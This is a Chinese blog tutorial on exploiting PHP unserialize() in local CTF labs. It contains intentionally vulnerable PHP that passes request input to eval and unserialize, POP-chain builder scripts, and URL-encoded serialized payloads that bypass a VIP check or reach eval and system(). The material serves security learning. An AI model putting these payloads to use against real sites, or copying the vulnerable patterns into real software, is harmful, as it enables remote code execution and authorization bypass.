PHP序列化总结3--反序列化的简单利用及案例分析

已于 2023-12-30 14:30:31 修改
阅读量1.2k 收藏 20
点赞数 19
分类专栏: Web安全漏洞 文章标签: php web安全 PHP反序列化
于 2023-12-30 14:30:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66458291/article/details/135304308
版权

反序列化中生成对象里面的值,是由反序列化里面的值决定,与原类中预定义的值的值无关,穷反序列化的对象可以使用类中的变量和方法

案例分析

反序列化中的值可以覆盖原类中的值

我们创建一个对象,对象创建的时候触发了construct方法输出字符串,在程序结束后,执行了系统命令ipconfig

我们修改一下条件,将创建B()对象的方式使用unserialize()进行传入数据,我们可以看到construct()函数没有被执行,但是对象销毁的时候还是调用了__destruct()函数执行了系统命令

修改一下源码,将ipconfig这个操作使用一个参数进行接收传递,我们这样的话我们构造x参数的值的时候我们就可以将这个变量转化为我们想要执行的命令如图

我们可以将cmd命令转化为我们指定的命令例如ver,然后修改对应的值,我们就可以执行我们想要的命令,例如我们想要执行ver命令,我们就把ipconfig改成ver并修改参数值即可返回我们想要执行的结果

接下来用几个案例来解释php反序列化的原理

案例分析
案例1

案例源码

<?php
error_reporting(0);
highlight_file(__FILE__);
class test{
    function __destruct(){
        echo "destruct... <br>";
        eval($_GET['cmd']);
    }
}
unserialize($_GET['u']);
?>

通过代码分析我们可以知道,反序列化接收一个数据,如果我们想要执行eval函数,我们就要触发__destruct()方法,为此我们需要创建一个对象即可触发,然后再传递一个cmd参数进行命令执行即可

pop构造代码

<?php
class test{
   
}
$c = new test();
echo serialize($c);
echo '<br>';
echo urlencode(serialize($c))
?>

构造结果:

http://127.0.0.1/ctfshow/demo1.php?u=O:4:"test":0:{}&cmd=phpinfo();

执行结果

将phpinfo();改为了system('系统命令');就可以执行系统命令

案例2

案例源码

<?php
error_reporting(0);
highlight_file(__FILE__);
class lemon{
        protected $ClassObj;
        function __construct(){
            $this->ClassObj=new normal();
    }
        function __destruct(){
            $this->ClassObj->action();
        }
    
    }
    
    class normal{
        function action(){
            echo "hello";
        }
    }
    class evil{
        private $data;
        function action(){
            eval($this->data);
    }
}
    
    unserialize($_GET['d']); 
?>

通过代码我们可以看到数据是通过unserialize进行传输,为此我们就可以利用传入的参数进行控制代码的显示,我们使用我们创建一个序列化的lemon对象,将其中的construct函数中的new normal()改为new evil()为后面的命令执行做准备,然后因为eval里面传递的是data的值,我们可以将其赋值为我们想要执行的命令,就可以实现命令执行

pop构造源码

<?php
class lemon{
	protected $ClassObj;
	function __construct(){
	 	$this->ClassObj= new evil();
	}
}
class evil{
	private $data="phpinfo();";
}

echo serialize(new lemon());
?>

因为我们是通过url传参,可能在传递的过程中会出现问题,为此我们进行URL编码进行url传递

O%3A5%3A%22lemon%22%3A2%3A%7Bs%3A11%3A%22%00%2A%00classObj%22%3BN%3Bs%3A8%3A%22ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

结果展示

执行了phpinfo()的效果

本地复现了ctfshow的几个关卡来学习php反序列化
案例3
<?php
error_reporting(0);
highlight_file(__FILE__);

 
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
 
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
           include('flag.php');
        }else{
            echo "no vip, no flag";
        }
    }
}
 
$username=$_GET['username'];
$password=$_GET['password'];
 
if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

这题和序列化无关,根据要求传入username和password的值即可

127.0.0.1/ctfshow/ser1.php?username=xxxxxx&password=xxxxxx

结果展示

案例4
<?php
error_reporting(0);
highlight_file(__FILE__);


class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            include('flag.php');
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

从代码中分析,绕过我们要获取flag需要调用vipOneKeyGetFlag(),但是这个函数里面使用了isVip这个变量,被赋值为flase,又因为传参的时候是通过反序列化接收的cookie的值,我们可以通过这个反序列化函数传入一个isVip变量为ture的值,然后获取flag

pop构造源码

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
}
$c = new ctfShowUser();
echo serialize($c);
echo '<br>';
echo urlencode(serialize($c))
?>

为了方便传输我们要进行url编码即:

O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

结果展示

案例5
<?php
highlight_file(__FILE__);
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                   include('flag.php');
              }
        }else{
             echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

 

通过代码分析我们可以知道,这题的关键就是所给的username的值和password的值相等,但是触发条件有不相等,我们就需要使用反序列化函数将其中的username和password分别改为不同的值进行传参,然后触发条件即可

我们可以构造源码

<?php
class ctfShowUser{
    public $username='x';
    public $password='y';
    public $isVip=true;
}
$c = new ctfShowUser();
echo serialize($c);
echo '<br>';
echo urlencode(serialize($c))
?>

为了方便传输我们要进行url编码即:

O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

结果展示

案例6
<?php
//eval('phpinfo();');
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_GET['user']);
    $user->login($username,$password);
}

环境复现有点问题,在网上找了个结果的截图

写在最后

如有错误,请及时指出,感谢

网安?阿哲
关注
  • 19
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(37)【PHP反序列化PHP反序列化原理、函数、利用过程
04-17 3652
【专题】PHP反序列化利用
深度剖析PHP序列化反序列化
weixin_30698527的博客
03-20 77
序列化 序列化格式 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 序列化函数原型如下: string serialize ( mixed $value ) 先看下面的例子: class CC { public $data; private $pass; public function __construct($data, $pass) ...
浅谈 php原生类的利用 1(文件操作类)
weixin_63231007的博客
05-13 2100
前言 在学习的过程中,战队里的师傅给我发了一道之前没遇见过的反序列化题,引出了原生类这个方面。这一知识点在后面刷题时也会遇到,提前学习一下。借这道题,对原生类的知识点进行一下学习与记录。 例题: <?php highlight_file(__FILE__); class a{ public $un0; public $un1; public $un2; public $un3; public $un4; public functio
CTF刷题
qq_45655136的博客
08-05 6308
刷题网站:bugku;BUUCTF 本文记录了在刷题过程中所学到的知识点 坚持每天刷5道题,持续更新 坚持就是胜利鸭 CTF 1、bugku–Simple_SSLI_1 根据题目SSLI即服务端模板注入攻击,服务段接收用户输入,将其作为web应用模板的一部分,渲染编译后执行恶意内容,导致敏感信息泄露、代码执行等。 直接F12,发现提示in the flask,set a secret_key flask模板,config是flask模板中的一个全局对象,包含了所有应用程序的配置值。 然后在url输入/?fl
Ruby ERB注入&&反序列化
qq_53142368的博客
06-07 839
Ruby ERB注入 现在的Web应用中,许多客户端以及服务器端经常会用到模板。许多模板引擎提供了多种不同的编程语言实现,比如Smarty、Mako、Jinja2、Jade、Velocity、Freemaker以及Twig等模板。作为注入攻击大家族中的一员,模板注入这种攻击形式对不同的目标所造成的影响也有所不同。对于AngularJS而言,模板注入攻击可以达到XSS攻击效果,对于服务器端的注入攻击而言,模板注入攻击可以达到远程代码执行效果。 ERB时Ruby自带的 <% 写逻辑脚本(Ruby语法) %
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
总结来说,这个主题涵盖了Web安全中的关键概念,包括Java和PHP序列化漏洞利用,以及如何利用这些漏洞进行命令执行。了解和防止这类漏洞对于保护Web应用程序的安全至关重要。开发者应该确保在反序列化过程中对数据...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
但这个案例提醒我们,当处理反序列化数据时,必须小心谨慎,避免将不可信的输入直接反序列化为敏感的或有权限的对象。 总之,PHP反序列化漏洞是安全性的一个重要关注点,需要开发者在设计和实现时考虑到潜在的风险...
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
反序列化漏洞涉及`serialize()`和`unserialize()`函数,攻击者可以通过构造特定的序列化数据来触发类的构造函数或破坏对象状态,从而执行恶意代码。 此外,其他如`unlink()`, `file_get_contents()`, `show_source...
PHP实例开发源码-蓝色站酷公司网站整站.zip
11-23
132692898345931367这个文件名看起来像是一个随机生成的数字序列,可能代表某个特定的资源或者版本号。在实际的项目中,这样的文件可能是数据库备份、日志文件或者加密的密钥,具体用途需要根据源码内的引用来确定。...
php cli配置文件问题分析
10-23
问题起源于作者在教他人使用protobuf(一种数据序列化协议)时,遇到的PHP CLI模式下的权限和配置文件问题。将protobuf生成的PHP类库放置在一个公共目录后,其他同事在使用时出现了“Permission denied”的错误。...
PHP序列化:eval
小龙在线
07-29 210
解题思路通过传入d参数,参数是序列化后的字符串,用来调用魔术方法__destruct,然后调用evil的action,进而可以执行eval。
实战某大型连锁企业域渗透
Ms08067安全实验室
07-04 995
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书实战域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...
php header函数使用无效怎么解决
滴水石穿
07-03 200
如果使用PHP header函数时发生无效的情况,可能有几种可能的原因和解决方法: 1、确保在调用header函数之前没有输出任何内容。header函数必须在任何输出之前调用,包括HTML标记、空格、换行符等。 2、确保没有使用BOM(Byte Order Mark)标记。BOM是一种在UTF-8编码中用于标识文件开头的特殊字符序列,它会导致header函数无效。可以使用文本编辑器将文件另存为UTF-8无BOM格式。 注意:在某些情况下,BOM会导致PHP session无法正常工作,因为session数据
Vulnhub靶场DC-6练习
最新发布
Reset
07-08 618
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
wordpress网站添加一个临时维护功能
爱酷码的博客
07-07 155
有时遇到一些情况,比如站点需要闭站备案、或者被要求停站等等,我们就可以使用本文的功能,使我们的 wordpress 站点一键进入站点维护模式:打开站点的任意链接都显示“站点维护中”的字眼,而且返回 503 响应码比整站关闭对搜索引擎更加友好~把以下代码放到functions.php文件中,主要用网站临时维护或者用于备案。事情做好了,把以下代码删除即可!
PHP灵活用工任务小灵通微信小程序系统源码
2401_84413757的博客
07-08 240
🤔 别担心,灵活用工任务小灵通微信小程序拥有智能匹配系统,它会根据你的技能标签、工作经验和空闲时间,为你精准推荐最适合的任务。🔍 这样一来,你不仅能发挥自己的优势,还能在高效完成任务的同时,享受工作的乐趣!🤔 灵活用工任务小灵通微信小程序,汇聚了各行各业的灵活用工任务,从文案撰写、设计制图到市场推广、客服服务,应有尽有!💼 只需动动手指,就能浏览到海量任务列表,随时随地接单,轻松赚取额外收入,让你的生活更加丰富多彩!在灵活用工任务小灵通微信小程序里,你不仅能找到兼职任务,还能结识一群志同道合的伙伴!
CVE-2023-30212(xss漏洞)
Battery的博客
07-04 2681
OURPHP版本
thinkphp6/8 验证码
php菜鸟技术天地
07-03 199
如果不=2,在APP/middleware.php中,加上\think\middleware\SessionInit::class。打印dump(session_status());如果验证一直失败,看看Session是否开启,html和后台验证代码按官方来操作。这种全局开启,单独开启没搞。
GDP播放器 驱动视频播放器 PHP 系统源码 v4.4.3
荻酷网的博客
07-04 652
最重要的是我们自己开发了源代码,因此无论您在使用此工具时遇到什么问题,我们都会快速解决。分别支持PHP7.4/8.1/8.2三个版本。
致远m3-server反序列化rce漏洞复现
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了复现这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如ysoserial等,用于构造恶意的反序列化payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功复现了漏洞,需要及时向致远m3-server的官方或相关安全机构报告漏洞细节,以便及时修复和防范。 总的来说,复现致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值